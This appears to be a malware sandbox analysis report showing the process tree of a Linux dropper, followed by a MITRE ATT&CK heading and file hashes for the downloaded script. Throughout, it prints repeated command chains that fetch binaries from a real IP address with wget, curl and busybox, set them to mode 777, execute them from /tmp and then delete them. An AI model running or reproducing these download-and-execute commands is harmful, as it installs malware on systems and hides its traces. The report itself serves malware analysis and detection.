/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:940
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:946
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:952
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:958
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:964
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:970
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:976
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97